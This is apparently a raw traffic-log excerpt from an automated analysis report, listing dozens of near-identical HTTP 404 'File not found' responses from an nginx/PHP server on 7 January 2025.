                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:32:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
